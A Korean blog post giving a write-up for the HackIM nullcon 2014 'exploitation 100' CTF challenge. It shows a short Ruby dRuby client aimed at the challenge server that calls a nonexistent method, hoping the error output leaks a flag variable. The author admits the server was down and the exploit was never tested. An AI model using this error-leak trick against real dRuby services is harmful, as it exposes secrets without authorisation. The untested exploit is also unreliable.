상세 컨텐츠

본문 제목

HackIM nullcon exploitation 100 write-up [exploit]

0x10 정보보안/0x15 System

by sweetchip 2014. 1. 27. 15:34

본문

반응형



binary :

SERVER.rb


require 'drb/drb'


# The URI to connect to

#SERVER_URI="druby://127.0.0.1:8988"

SERVER_URI="druby://23.23.190.205:8988"


# Start a local DRbServer to handle callbacks.

#

# Not necessary for this small example, but will be required

# as soon as we pass a non-marshallable object as an argument

# to a dRuby call.

DRb.start_service


timeserver = DRbObject.new_with_uri(SERVER_URI)

puts timeserver.get_current_time1



서버가 닫혀있어서 시도해보진 못햇지만 잘못된 메소드 이름을 사용하면 오류가 발생할것이고


그 안에 변수로 설정된 flag도 함께 출력된다


위 exploit이 다르면 덧글로 달아주세요


관리자에게 서버 관련 문의를 해도 정상적이라는 답변만 돌아와서 시도하지는 못했습니다.

반응형

관련글 더보기